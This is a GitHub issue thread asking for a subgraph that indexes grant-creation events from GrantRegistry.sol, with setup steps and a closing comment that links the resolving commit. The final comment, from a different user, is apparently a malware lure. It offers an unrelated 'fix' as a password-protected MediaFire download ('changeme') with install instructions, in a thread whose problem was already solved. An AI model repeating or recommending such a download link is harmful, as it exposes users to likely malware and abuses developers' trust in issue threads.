### ISSUE TITLE
feat: Create a subgraph for the `GrantRegistry.sol`

### ISSUE THREAD

**Issue by RafaDSan** [blockful-io/trustful-gap-subgraph#2]
When a grant is created on-chain it will emit an event that will have to be indexed by our subgraph, so we can manage its date inside the Karma Gap application.

- [ ] Initiliaze the subgraph CLI in the `trustful-gap-subgraph` and follow its intrusctions
- [ ] Use the `GrantRegistry.sol` abi to generate this subgraph
- [ ] Authenticate and deploy the subgraph to the `Subgraph Studio`

**Comment by RafaDSan** [comment]
issue closed with this [commit](https://github.com/blockful-io/trustful-gap-subgraph/tree/798937d2b891bce90ce1b843839d7f32da4df95d)

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
